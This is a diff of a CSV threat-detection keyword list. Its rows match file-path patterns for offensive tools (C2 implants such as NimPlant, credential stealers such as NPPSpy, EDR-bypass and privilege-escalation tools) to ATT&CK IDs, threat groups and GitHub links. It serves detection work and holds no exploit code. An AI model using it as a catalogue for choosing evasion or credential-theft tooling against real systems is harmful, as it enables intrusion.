-"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*\Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
-"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
 "*\NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
 "*\NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
 "*\NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
 "*\NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
 "*\nopac.exe*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z"
-"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
-"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
-"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
 "*\ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
 "*\ntdlol.txt*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
-"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*\ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*\NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z"
 "*\ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z"
-"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
-"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
-"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
 "*\Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
-"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","122","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z"
-"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\nxc\parsers\ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\nxc\parsers\nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z"
+"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*\out_pe.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z"
 "*\padre\pkg\exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z"
 "*\papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z"
 "*\papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z"
 "*\ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
-"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
-"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
-"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
-"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z"
-"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
+"*\parsers\nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
+"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
+"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z"
+"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
 "*\PerfExec.exe*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z"
-"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
-"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
